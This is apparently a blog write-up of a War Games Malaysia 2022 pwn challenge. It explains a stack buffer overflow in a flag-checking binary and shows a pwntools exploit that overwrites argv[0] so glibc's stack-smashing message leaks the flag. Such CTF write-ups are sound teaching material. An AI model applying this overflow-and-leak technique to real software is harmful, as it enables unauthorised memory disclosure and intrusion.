<!doctype html><html lang=en-gb><head><meta charset=utf-8><meta http-equiv=content-type content="text/html"><meta name=viewport content="width=device-width,initial-scale=1"><title itemprop=name>Flag Checker (pwn) -- War Games Malaysia | a rant of my adventures</title>
<meta property="og:title" content="Flag Checker (pwn) -- War Games Malaysia | a rant of my adventures"><meta name=twitter:title content="Flag Checker (pwn) -- War Games Malaysia | a rant of my adventures"><meta itemprop=name content="Flag Checker (pwn) -- War Games Malaysia | a rant of my adventures"><meta name=application-name content="Flag Checker (pwn) -- War Games Malaysia | a rant of my adventures"><meta property="og:site_name" content="a rant of my adventures"><meta name=description content="pwn challenge from war games malaysia"><meta itemprop=description content="pwn challenge from war games malaysia"><meta property="og:description" content="pwn challenge from war games malaysia"><meta name=twitter:description content="pwn challenge from war games malaysia"><meta property="og:locale" content="en-gb"><meta name=language content="en-gb"><link rel=alternate hreflang=en-gb href=https://blog.caprinux.com/posts/ctfs/2022/wgmy-flag-checker/ title=English><meta itemprop=image content="https://blog.caprinux.com/"><meta property="og:image" content="https://blog.caprinux.com/"><meta name=twitter:image content="https://blog.caprinux.com/"><meta name=twitter:image:src content="https://blog.caprinux.com/"><meta property="og:type" content="article"><meta property="og:article:published_time" content=2022-12-31T05:59:12Z><meta property="article:published_time" content=2022-12-31T05:59:12Z><script defer type=application/ld+json>{"@context":"http://schema.org","@type":"Article","headline":"Flag Checker (pwn) -- War Games Malaysia","author":{"@type":"Person","name":""},"datePublished":"2022-12-31","description":"pwn challenge from war games malaysia","wordCount":1340,"mainEntityOfPage":"True","dateModified":"2022-12-31","image":{"@type":"imageObject","url":""},"publisher":{"@type":"Organization","name":"a rant of my adventures"}}</script><meta name=generator content="Hugo 0.125.4"><link rel=canonical href=https://blog.caprinux.com/posts/ctfs/2022/wgmy-flag-checker/><link href=/style.min.5d415e34e927589b6ad5fe83ea6f8006479d2d6c2fa7897ee14c54c5618ba634.css rel=stylesheet><link href=/code-highlight.min.706d31975fec544a864cb7f0d847a73ea55ca1df91bf495fd12a177138d807cf.css rel=stylesheet><link rel=apple-touch-icon sizes=180x180 href=/icons/apple-touch-icon.png><link rel=icon type=image/png sizes=32x32 href=/icons/favicon-32x32.png><link rel=icon type=image/png sizes=16x16 href=/icons/favicon-16x16.png><link rel=mask-icon href=/icons/safari-pinned-tab.svg><link rel="shortcut icon" href=/favicon.ico><link rel=manifest href=https://blog.caprinux.com/site.webmanifest><meta name=msapplication-config content="/browserconfig.xml"><meta name=msapplication-TileColor content="#2d89ef"><meta name=theme-color content="#434648"><link rel=icon type=image/svg+xml href=/icons/favicon.svg></head><body data-theme=dark class=notransition><script src=/js/theme.min.8961c317c5b88b953fe27525839672c9343f1058ab044696ca225656c8ba2ab0.js integrity="sha256-iWHDF8W4i5U/4nUlg5ZyyTQ/EFirBEaWyiJWVsi6KrA="></script><meta http-equiv=cache-control content="max-age=0"><meta http-equiv=cache-control content="no-cache"><meta http-equiv=expires content="0"><meta http-equiv=expires content="Tue, 01 Jan 1980 1:00:00 GMT"><meta http-equiv=pragma content="no-cache"><div class=navbar role=navigation><nav class=menu aria-label="Main Navigation"><a href=https://blog.caprinux.com/ class=logo><svg xmlns="http://www.w3.org/2000/svg" width="25" height="25" viewBox="0 0 24 24" fill="none" stroke="currentcolor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="feather feather-home"><title>Home</title><path d="M3 9l9-7 9 7v11a2 2 0 01-2 2H5a2 2 0 01-2-2z"/><polyline points="9 22 9 12 15 12 15 22"/></svg>
</a><input type=checkbox id=menu-trigger class=menu-trigger>
<label for=menu-trigger><span class=menu-icon><svg xmlns="http://www.w3.org/2000/svg" width="25" height="25" stroke="currentcolor" fill="none" viewBox="0 0 14 14"><title>Menu</title><path stroke-linecap="round" stroke-linejoin="round" d="M10.595 7H3.40726"/><path stroke-linecap="round" stroke-linejoin="round" d="M10.5096 3.51488H3.49301"/><path stroke-linecap="round" stroke-linejoin="round" d="M10.5096 10.4851H3.49301"/><path stroke-linecap="round" stroke-linejoin="round" d="M.5 12.5V1.5c0-.552285.447715-1 1-1h11C13.0523.5 13.5.947715 13.5 1.5v11C13.5 13.0523 13.0523 13.5 12.5 13.5H1.5C.947715 13.5.5 13.0523.5 12.5z"/></svg></span></label><div class=trigger><ul class=trigger-container><li><a class=menu-link href=/>Home</a></li><li><a class="menu-link active" href=/posts/>Posts</a></li><li><a class=menu-link href=/pwn/>Pwn</a></li><li><a class=menu-link href=/pages/about/>About</a></li><li class=menu-separator><span></span></li></ul><a id=mode href=#><svg xmlns="http://www.w3.org/2000/svg" class="mode-sunny" width="21" height="21" viewBox="0 0 14 14" stroke-width="1"><title>LIGHT</title><g><circle cx="7" cy="7" r="2.5" fill="none" stroke-linecap="round" stroke-linejoin="round"/><line x1="7" y1=".5" x2="7" y2="2.5" fill="none" stroke-linecap="round" stroke-linejoin="round"/><line x1="2.4" y1="2.4" x2="3.82" y2="3.82" fill="none" stroke-linecap="round" stroke-linejoin="round"/><line x1=".5" y1="7" x2="2.5" y2="7" fill="none" stroke-linecap="round" stroke-linejoin="round"/><line x1="2.4" y1="11.6" x2="3.82" y2="10.18" fill="none" stroke-linecap="round" stroke-linejoin="round"/><line x1="7" y1="13.5" x2="7" y2="11.5" fill="none" stroke-linecap="round" stroke-linejoin="round"/><line x1="11.6" y1="11.6" x2="10.18" y2="10.18" fill="none" stroke-linecap="round" stroke-linejoin="round"/><line x1="13.5" y1="7" x2="11.5" y2="7" fill="none" stroke-linecap="round" stroke-linejoin="round"/><line x1="11.6" y1="2.4" x2="10.18" y2="3.82" fill="none" stroke-linecap="round" stroke-linejoin="round"/></g></svg><svg xmlns="http://www.w3.org/2000/svg" class="mode-moon" width="21" height="21" viewBox="0 0 14 14" stroke-width="1"><title>DARK</title><g><circle cx="7" cy="7" r="2.5" fill="none" stroke-linecap="round" stroke-linejoin="round"/><line x1="7" y1=".5" x2="7" y2="2.5" fill="none" stroke-linecap="round" stroke-linejoin="round"/><line x1="2.4" y1="2.4" x2="3.82" y2="3.82" fill="none" stroke-linecap="round" stroke-linejoin="round"/><line x1=".5" y1="7" x2="2.5" y2="7" fill="none" stroke-linecap="round" stroke-linejoin="round"/><line x1="2.4" y1="11.6" x2="3.82" y2="10.18" fill="none" stroke-linecap="round" stroke-linejoin="round"/><line x1="7" y1="13.5" x2="7" y2="11.5" fill="none" stroke-linecap="round" stroke-linejoin="round"/><line x1="11.6" y1="11.6" x2="10.18" y2="10.18" fill="none" stroke-linecap="round" stroke-linejoin="round"/><line x1="13.5" y1="7" x2="11.5" y2="7" fill="none" stroke-linecap="round" stroke-linejoin="round"/><line x1="11.6" y1="2.4" x2="10.18" y2="3.82" fill="none" stroke-linecap="round" stroke-linejoin="round"/></g></svg></a></div></nav></div><div class="wrapper post"><main class=page-content aria-label=Content><article><header class=header><h1 class=header-title>Flag Checker (pwn) -- War Games Malaysia</h1><div class=post-meta><time datetime=2022-12-31T05:59:12+00:00 itemprop=datePublished>31 Dec 2022</time></div></header><details class=toc open><summary><b>Table of Contents</b></summary><nav id=TableOfContents><ul><li><a href=#setup>Setup</a></li><li><a href=#looking-for-our-vulnerability>Looking for our vulnerability</a></li><li><a href=#writing-the-exploit>Writing the exploit</a></li><li><a href=#hindsight>Hindsight</a></li></ul></nav></details><div class=page-content><h1 id=flagchecker>FlagChecker</h1><p><em>pwn challenge from wgmy2022</em></p><pre tabindex=0><code>FlagChecker.zip
├── bin
│   ├── flag_checker
│   └── flag.txt
├── ctf.xinetd
├── docker-compose.yml
├── Dockerfile
└── start.sh
</code></pre><h2 id=setup>Setup</h2><p>Since we are provided with the Dockerfile, we can start by setting up our environment (extracting the LIBC and LD) to mimic the environment of the server.</p><p>Upon setting up our docker, we can spawn a shell as shown below</p><pre tabindex=0><code>❯ docker exec -it wgmy-flag_checker-1 /bin/bash

root@ef917d02df99:/home/ctf# ldd flag_checker # show the dependencies
        linux-vdso.so.1 =&gt;  (0x00007ffe15bfe000)
        libc.so.6 =&gt; /lib/x86_64-linux-gnu/libc.so.6 (0x00007fa350800000)
        /lib64/ld-linux-x86-64.so.2 (0x00007fa350c00000)
root@ef917d02df99:/home/ctf# ls -al /lib64/ld-linux-x86-64.so.2 /lib/x86_64-linux-gnu/libc.so.6
lrwxrwxrwx 1 root root 32 Apr 21  2021 /lib64/ld-linux-x86-64.so.2 -&gt; /lib/x86_64-linux-gnu/ld-2.23.so
lrwxrwxrwx 1 root root 12 Apr 21  2021 /lib/x86_64-linux-gnu/libc.so.6 -&gt; libc-2.23.so
</code></pre><p>As we can see, the binary is dynamically compiled with the libc and ld at the paths shown above. We can copy out both the libc and ld into our host.</p><pre tabindex=0><code>❯  docker cp wgmy-flag_checker-1:/lib/x86_64-linux-gnu/ld-2.23.so .
❯  docker cp wgmy-flag_checker-1:/lib/x86_64-linux-gnu/libc-2.23.so .
</code></pre><p>Finally, we can link the libc and the ld to our binary in our host, which would cause the environment to be identical to that of the remote server (which we ultimately need to exploit to get the flag).</p><pre tabindex=0><code>❯ ldd flag_checker
        linux-vdso.so.1 (0x00007fffafdfd000)
        ./libc-2.23.so (0x00007fa3afa00000)
        ./ld-2.23.so =&gt; /usr/lib64/ld-linux-x86-64.so.2 (0x00007fa3afe61000)

❯ patchelf --replace-needed libc.so.6 ./libc-2.23.so --set-interpreter ./ld-2.23.so  ./flag_checker
</code></pre><p>Voila! Our setup is done.</p><p><em>note: i choose to copy my binary out instead of directly using the binary in the docker because it is easier to pwn on my local machine due to tools and what not</em></p><h2 id=looking-for-our-vulnerability>Looking for our vulnerability</h2><p>If we decompile the program, we see that it is a really simple program:</p><div class=highlight><pre tabindex=0 class=chroma><code class=language-c data-lang=c><span class=line><span class=cl><span class=kt>char</span> <span class=n>flag</span><span class=p>[</span><span class=mi>64</span><span class=p>];</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl><span class=kt>int</span> <span class=nf>main</span><span class=p>()</span>
</span></span><span class=line><span class=cl><span class=p>{</span>
</span></span><span class=line><span class=cl>  <span class=n>FILE</span> <span class=o>*</span><span class=n>stream</span><span class=p>;</span>
</span></span><span class=line><span class=cl>  <span class=kt>char</span> <span class=n>input</span><span class=p>[</span><span class=mi>72</span><span class=p>];</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl>  <span class=n>stream</span> <span class=o>=</span> <span class=nf>fopen</span><span class=p>(</span><span class=s>&#34;flag.txt&#34;</span><span class=p>,</span> <span class=s>&#34;r&#34;</span><span class=p>);</span>
</span></span><span class=line><span class=cl>  <span class=nf>fgets</span><span class=p>(</span><span class=n>flag</span><span class=p>,</span> <span class=mi>64</span><span class=p>,</span> <span class=n>stream</span><span class=p>);</span>
</span></span><span class=line><span class=cl>  <span class=nf>setbuf</span><span class=p>(</span><span class=n>stdin</span><span class=p>,</span> <span class=mi>0LL</span><span class=p>);</span>
</span></span><span class=line><span class=cl>  <span class=nf>setbuf</span><span class=p>(</span><span class=n>stdout</span><span class=p>,</span> <span class=mi>0LL</span><span class=p>);</span>
</span></span><span class=line><span class=cl>  <span class=nf>setbuf</span><span class=p>(</span><span class=n>stderr</span><span class=p>,</span> <span class=mi>0LL</span><span class=p>);</span>
</span></span><span class=line><span class=cl>  <span class=nf>puts</span><span class=p>(</span><span class=s>&#34;Flag Checker&#34;</span><span class=p>);</span>
</span></span><span class=line><span class=cl>  <span class=nf>puts</span><span class=p>(</span><span class=s>&#34;------------&#34;</span><span class=p>);</span>
</span></span><span class=line><span class=cl>  <span class=nf>printf</span><span class=p>(</span><span class=s>&#34;Enter flag: &#34;</span><span class=p>);</span>
</span></span><span class=line><span class=cl>  <span class=nf>scanf</span><span class=p>(</span><span class=s>&#34;%s&#34;</span><span class=p>,</span> <span class=n>input</span><span class=p>);</span>
</span></span><span class=line><span class=cl>  <span class=k>if</span> <span class=p>(</span> <span class=o>!</span><span class=nf>strcmp</span><span class=p>(</span><span class=n>flag</span><span class=p>,</span> <span class=n>input</span><span class=p>)</span> <span class=p>)</span>
</span></span><span class=line><span class=cl>    <span class=nf>puts</span><span class=p>(</span><span class=s>&#34;Correct flag!&#34;</span><span class=p>);</span>
</span></span><span class=line><span class=cl>  <span class=k>else</span>
</span></span><span class=line><span class=cl>    <span class=nf>puts</span><span class=p>(</span><span class=s>&#34;Wrong flag!&#34;</span><span class=p>);</span>
</span></span><span class=line><span class=cl>  <span class=k>return</span> <span class=mi>0</span><span class=p>;</span>
</span></span><span class=line><span class=cl><span class=p>}</span>
</span></span></code></pre></div><p>It simply reads the flag into the memory <em>(more specifically, the .bss segment)</em>, and takes in an input.</p><p>There is an obvious buffer overflow &mdash; we are not limiting the size of our input via scanf. At first glance, this challenge may suddenly seem trivial due to the presence of an easy buffer overflow and a flag in the memory.</p><p>However, if we look at the security of the binary,</p><div class=highlight><pre tabindex=0 class=chroma><code class=language-sh data-lang=sh><span class=line><span class=cl>❯ checksec flag_checker
</span></span><span class=line><span class=cl><span class=o>[</span>*<span class=o>]</span> <span class=s1>&#39;/home/elmo/wgmy/bin/flag_checker&#39;</span>
</span></span><span class=line><span class=cl>    Arch:     amd64-64-little
</span></span><span class=line><span class=cl>    RELRO:    Partial RELRO
</span></span><span class=line><span class=cl>    Stack:    Canary found
</span></span><span class=line><span class=cl>    NX:       NX enabled
</span></span><span class=line><span class=cl>    PIE:      No PIE <span class=o>(</span>0x3ff000<span class=o>)</span>
</span></span></code></pre></div><p>We see that the stack canary protection is enabled. This renders our stack-based buffer overflow almost useless, since we are guaranteed to overwrite the canary as soon as we try to overflow our buffer.</p><p>Additionally, there is no obvious way to leak the canary in the program. This makes the challenge a lot more complex.</p><p>Naturally, if we try to overflow the binary with a large buffer,</p><div class=highlight><pre tabindex=0 class=chroma><code class=language-c data-lang=c><span class=line><span class=cl><span class=err>❯</span> <span class=p>.</span><span class=o>/</span><span class=n>flag_checker</span>
</span></span><span class=line><span class=cl><span class=n>Flag</span> <span class=n>Checker</span>
</span></span><span class=line><span class=cl><span class=o>------------</span>
</span></span><span class=line><span class=cl><span class=n>Enter</span> <span class=nl>flag</span><span class=p>:</span> <span class=n>AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA</span>
</span></span><span class=line><span class=cl><span class=n>Wrong</span> <span class=n>flag</span><span class=o>!</span>
</span></span><span class=line><span class=cl><span class=o>***</span> <span class=n>stack</span> <span class=n>smashing</span> <span class=n>detected</span> <span class=o>***:</span> <span class=p>.</span><span class=o>/</span><span class=n>flag_checker</span> <span class=n>terminated</span>
</span></span><span class=line><span class=cl><span class=nf>Aborted</span> <span class=p>(</span><span class=n>core</span> <span class=n>dumped</span><span class=p>)</span>
</span></span></code></pre></div><p>our program will crash with a &ldquo;stack smashing detected&rdquo; message. This is expected.</p><p>However, if we increase the size of our overflow,</p><div class=highlight><pre tabindex=0 class=chroma><code class=language-c data-lang=c><span class=line><span class=cl><span class=err>❯</span> <span class=p>.</span><span class=o>/</span><span class=n>flag_checker</span>
</span></span><span class=line><span class=cl><span class=n>Flag</span> <span class=n>Checker</span>
</span></span><span class=line><span class=cl><span class=o>------------</span>
</span></span><span class=line><span class=cl><span class=n>Enter</span> <span class=nl>flag</span><span class=p>:</span> <span class=n>AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA</span>
</span></span><span class=line><span class=cl><span class=n>Wrong</span> <span class=n>flag</span><span class=o>!</span>
</span></span><span class=line><span class=cl><span class=n>Segmentation</span> <span class=nf>fault</span> <span class=p>(</span><span class=n>core</span> <span class=n>dumped</span><span class=p>)</span>
</span></span></code></pre></div><p>We see that there is a segmentation fault instead of the expected &ldquo;stack smashing detected&rdquo;.</p><p>If we replicate the crash in GDB,</p><p><img src=https://i.imgur.com/EcNWYyo.png></p><p>we can see that our program crashes at the <code>getenv</code> symbol. Additionally, it crashes due to it trying to dereference our buffer.</p><p>If we look at the stack trace, we can see that the program flowed like this</p><pre tabindex=0><code>main -&gt; __stack_chk_fail --&gt; __fortify_fail --&gt; ? --&gt; getenv()
</code></pre><p>Let&rsquo;s look at the <code>__fortify_fail</code> source code.</p><div class=highlight><pre tabindex=0 class=chroma><code class=language-c data-lang=c><span class=line><span class=cl>
</span></span><span class=line><span class=cl><span class=nf>__fortify_fail</span> <span class=p>(</span><span class=k>const</span> <span class=kt>char</span> <span class=o>*</span><span class=n>msg</span><span class=p>)</span>
</span></span><span class=line><span class=cl><span class=p>{</span>
</span></span><span class=line><span class=cl>  <span class=cm>/* The loop is added only to keep gcc happy.  */</span>
</span></span><span class=line><span class=cl>  <span class=k>while</span> <span class=p>(</span><span class=mi>1</span><span class=p>)</span>
</span></span><span class=line><span class=cl>    <span class=nf>__libc_message</span> <span class=p>(</span><span class=mi>2</span><span class=p>,</span> <span class=s>&#34;*** %s ***: %s terminated</span><span class=se>\n</span><span class=s>&#34;</span><span class=p>,</span>
</span></span><span class=line><span class=cl>		    <span class=n>msg</span><span class=p>,</span> <span class=n>__libc_argv</span><span class=p>[</span><span class=mi>0</span><span class=p>]</span> <span class=o>?:</span> <span class=s>&#34;&lt;unknown&gt;&#34;</span><span class=p>);</span>
</span></span><span class=line><span class=cl><span class=p>}</span>
</span></span></code></pre></div><p>As we can see, <code>__fortify_fail</code> is simply a trampoline to <code>__libc_message_</code>. It calls <code>__libc_message</code> with 4 arguments.</p><p>The most important argument is the 4th argument, which is <code>__libc_argv[0]</code>. This is usually just the program name, and is stored right below the <code>main</code> function stack frame. <em>(we will just keep this at the back of our head for now)</em></p><p>Now if we look inside <code>__libc_message</code>,</p><div class=highlight><pre tabindex=0 class=chroma><code class=language-c data-lang=c><span class=line><span class=cl><span class=cm>/* Abort with an error message.  */</span>
</span></span><span class=line><span class=cl><span class=kt>void</span>
</span></span><span class=line><span class=cl><span class=nf>__libc_message</span> <span class=p>(</span><span class=kt>int</span> <span class=n>do_abort</span><span class=p>,</span> <span class=k>const</span> <span class=kt>char</span> <span class=o>*</span><span class=n>fmt</span><span class=p>,</span> <span class=p>...)</span>
</span></span><span class=line><span class=cl><span class=p>{</span>
</span></span><span class=line><span class=cl>    
</span></span><span class=line><span class=cl>  <span class=c1>// ...
</span></span></span><span class=line><span class=cl><span class=c1></span>    
</span></span><span class=line><span class=cl>  <span class=cm>/* Open a descriptor for /dev/tty unless the user explicitly
</span></span></span><span class=line><span class=cl><span class=cm>     requests errors on standard error.  */</span>
</span></span><span class=line><span class=cl>  <span class=k>const</span> <span class=kt>char</span> <span class=o>*</span><span class=n>on_2</span> <span class=o>=</span> <span class=nf>__libc_secure_getenv</span> <span class=p>(</span><span class=s>&#34;LIBC_FATAL_STDERR_&#34;</span><span class=p>);</span>
</span></span><span class=line><span class=cl>    
</span></span><span class=line><span class=cl>  <span class=c1>// ...
</span></span></span><span class=line><span class=cl><span class=c1></span>    
</span></span><span class=line><span class=cl>  <span class=k>if</span> <span class=p>(</span><span class=n>on_2</span> <span class=o>==</span> <span class=nb>NULL</span> <span class=o>||</span> <span class=o>*</span><span class=n>on_2</span> <span class=o>==</span> <span class=sc>&#39;\0&#39;</span><span class=p>)</span>
</span></span><span class=line><span class=cl>    <span class=n>fd</span> <span class=o>=</span> <span class=nf>open_not_cancel_2</span> <span class=p>(</span><span class=n>_PATH_TTY</span><span class=p>,</span> <span class=n>O_RDWR</span> <span class=o>|</span> <span class=n>O_NOCTTY</span> <span class=o>|</span> <span class=n>O_NDELAY</span><span class=p>);</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl>  <span class=k>if</span> <span class=p>(</span><span class=n>fd</span> <span class=o>==</span> <span class=o>-</span><span class=mi>1</span><span class=p>)</span>
</span></span><span class=line><span class=cl>    <span class=n>fd</span> <span class=o>=</span> <span class=n>STDERR_FILENO</span><span class=p>;</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl>  <span class=c1>// ...
</span></span></span><span class=line><span class=cl><span class=c1></span>
</span></span><span class=line><span class=cl>  <span class=c1>// output error message
</span></span></span><span class=line><span class=cl><span class=c1></span>  <span class=n>written</span> <span class=o>=</span> <span class=nf>WRITEV_FOR_FATAL</span> <span class=p>(</span><span class=n>fd</span><span class=p>,</span> <span class=n>iov</span><span class=p>,</span> <span class=n>nlist</span><span class=p>,</span> <span class=n>total</span><span class=p>);</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl>  <span class=c1>// ...
</span></span></span><span class=line><span class=cl><span class=c1></span>    
</span></span><span class=line><span class=cl>  <span class=k>if</span> <span class=p>(</span><span class=n>do_abort</span><span class=p>)</span>
</span></span><span class=line><span class=cl>    <span class=p>{</span>
</span></span><span class=line><span class=cl>      <span class=nf>BEFORE_ABORT</span> <span class=p>(</span><span class=n>do_abort</span><span class=p>,</span> <span class=n>written</span><span class=p>,</span> <span class=n>fd</span><span class=p>);</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl>      <span class=cm>/* Kill the application.  */</span>
</span></span><span class=line><span class=cl>      <span class=nf>abort</span> <span class=p>();</span>
</span></span><span class=line><span class=cl>    <span class=p>}</span>
</span></span><span class=line><span class=cl><span class=p>}</span>
</span></span></code></pre></div><p><code>__libc_message</code> tries to calls <code>getenv("LIBC_FATAL_STDERR")</code> to look for the <code>LIBC_FATAL_STDERR</code> environment variable and determine if the error output should be outputted to stdout, or not.</p><p>Otherwise, it will try to open a new file descriptor, and output the error message to that file descriptor before aborting.</p><p>Our program crashes on the call to <code>getenv</code>, which is called my <code>__libc_secure_getenv</code>. This is because when we increased the size of our overflow, we actually overflowed the entire environment variable block <em>(which is usually right below our main stack frame)</em>.</p><blockquote><p>the environmental variable block simply contains an array of pointers to strings that correspond with environmental variable and its value</p></blockquote><p>This results in a segmentation fault when <code>getenv</code> tries to look into our environment variables to find <code>LIBC_FATAL_STDERR</code>.</p><center><em>before increasing our overflow size -- overflow followed by enviromental variable block</em></center><p><img src=https://i.imgur.com/ZZEPrO7.png></p><center><em>after increasing our overflow size -- environmental variable block gone</em></center><p><img src=https://i.imgur.com/rA40LSM.png></p><p>By now, you may be wondering: how does all of this help me to get the flag? If we look at the error message again:</p><pre tabindex=0><code>*** stack smashing detected ***: ./flag_checker terminated
</code></pre><p>We can see that it is actually made out of 3 parts, <code>"*** %s ***: %s terminated"</code>, <code>"stack smashing detected"</code> and <code>"./flag_checker"</code>. All of which are actually the arguments provided to the <code>__libc_message</code> argument.</p><div class=highlight><pre tabindex=0 class=chroma><code class=language-python data-lang=python><span class=line><span class=cl><span class=c1># output from GDB</span>
</span></span><span class=line><span class=cl><span class=n>__libc_message</span> <span class=p>(</span>
</span></span><span class=line><span class=cl>   <span class=err>$</span><span class=n>rdi</span> <span class=o>=</span> <span class=mh>0x0000000000000001</span><span class=p>,</span>
</span></span><span class=line><span class=cl>   <span class=err>$</span><span class=n>rsi</span> <span class=o>=</span> <span class=mh>0x00007ffff798f59f</span> <span class=err>→</span> <span class=s2>&#34;*** </span><span class=si>%s</span><span class=s2> ***: </span><span class=si>%s</span><span class=s2> terminated</span><span class=se>\n</span><span class=s2>&#34;</span><span class=p>,</span>
</span></span><span class=line><span class=cl>   <span class=err>$</span><span class=n>rdx</span> <span class=o>=</span> <span class=mh>0x00007ffff798f581</span> <span class=err>→</span> <span class=s2>&#34;stack smashing detected&#34;</span><span class=p>,</span>
</span></span><span class=line><span class=cl>   <span class=err>$</span><span class=n>rcx</span> <span class=o>=</span> <span class=mh>0x00007fffffffc473</span> <span class=err>→</span> <span class=s2>&#34;/home/elmo/wgmy/bin/flag_checker&#34;</span>
</span></span><span class=line><span class=cl><span class=p>)</span>
</span></span></code></pre></div><p>Our exploit methodology is as such &mdash; overflow the program such that</p><ol><li><code>__libc_argv[0]</code> points to our flag <em>(argv is stored right before our environment variable block)</em></li><li>Program does not crash before it prints the output message.</li></ol><h2 id=writing-the-exploit>Writing the exploit</h2><p><code>getenv</code> will iterate through the array of environment variable pointer to look for the name.</p><p>If we look at the source code:</p><div class=highlight><pre tabindex=0 class=chroma><code class=language-c data-lang=c><span class=line><span class=cl><span class=kt>char</span> <span class=o>*</span> <span class=nf>getenv</span> <span class=p>(</span><span class=k>const</span> <span class=kt>char</span> <span class=o>*</span><span class=n>name</span><span class=p>)</span>
</span></span><span class=line><span class=cl><span class=p>{</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl>  <span class=k>if</span> <span class=p>(</span><span class=n>__environ</span> <span class=o>==</span> <span class=nb>NULL</span> <span class=o>||</span> <span class=n>name</span><span class=p>[</span><span class=mi>0</span><span class=p>]</span> <span class=o>==</span> <span class=sc>&#39;\0&#39;</span><span class=p>)</span>
</span></span><span class=line><span class=cl>    <span class=k>return</span> <span class=nb>NULL</span><span class=p>;</span>
</span></span><span class=line><span class=cl>  <span class=c1>// ...
</span></span></span><span class=line><span class=cl><span class=c1></span><span class=p>}</span>
</span></span></code></pre></div><p>Given that we can write whatever we want to the environment variable pointer, we want <code>getenv</code> to return without crashing.</p><p>Based on the source code above, we can simply set the first entry of the environment array to NULL.</p><p>If we look at this picture of the stack again</p><p><img src=https://i.imgur.com/ZZEPrO7.png></p><p>We see that our input starts at <code>$rsp+0x120</code>, and our argv[0] is at <code>$rsp+0x258</code> and our environment block starts at <code>$rsp+0x268</code>.</p><p>Ideally, we want <code>argv[0] == pointer_to_flag</code> and <code>__environ == NULL</code></p><p>Doing the math, <code>0x268 - 0x120 = 328 = offset to environment block</code> and <code>0x258 - 0x120 = 312 = argv[0]</code>.</p><p>We can write our exploit script as follows.</p><div class=highlight><pre tabindex=0 class=chroma><code class=language-python data-lang=python><span class=line><span class=cl><span class=kn>from</span> <span class=nn>pwn</span> <span class=kn>import</span> <span class=o>*</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl><span class=n>elf</span> <span class=o>=</span> <span class=n>ELF</span><span class=p>(</span><span class=s2>&#34;./flag_checker&#34;</span><span class=p>)</span>
</span></span><span class=line><span class=cl><span class=n>p</span> <span class=o>=</span> <span class=n>process</span><span class=p>(</span><span class=s2>&#34;./flag_checker&#34;</span><span class=p>)</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl><span class=n>p</span><span class=o>.</span><span class=n>sendline</span><span class=p>(</span><span class=n>fit</span><span class=p>({</span><span class=mi>312</span><span class=p>:</span> <span class=n>p64</span><span class=p>(</span><span class=n>elf</span><span class=o>.</span><span class=n>sym</span><span class=o>.</span><span class=n>flag</span><span class=p>),</span> <span class=c1># argv[0] == flag</span>
</span></span><span class=line><span class=cl>                <span class=mi>328</span><span class=p>:</span> <span class=n>p64</span><span class=p>(</span><span class=mi>0</span><span class=p>)}))</span>          <span class=c1># __environ == NULL</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl><span class=n>p</span><span class=o>.</span><span class=n>interactive</span><span class=p>()</span>
</span></span></code></pre></div><p>which would yield us the flag</p><div class=highlight><pre tabindex=0 class=chroma><code class=language-sh data-lang=sh><span class=line><span class=cl>❯ python3 xpl.py
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl><span class=o>[</span>+<span class=o>]</span> Starting <span class=nb>local</span> process <span class=s1>&#39;./flag_checker&#39;</span>: pid <span class=m>423423</span>
</span></span><span class=line><span class=cl><span class=o>[</span>*<span class=o>]</span> Switching to interactive mode
</span></span><span class=line><span class=cl>Flag Checker
</span></span><span class=line><span class=cl>------------
</span></span><span class=line><span class=cl>Enter flag: Wrong flag!
</span></span><span class=line><span class=cl>*** stack smashing detected ***: wgmy<span class=o>{</span>test_flag<span class=o>}</span> terminated
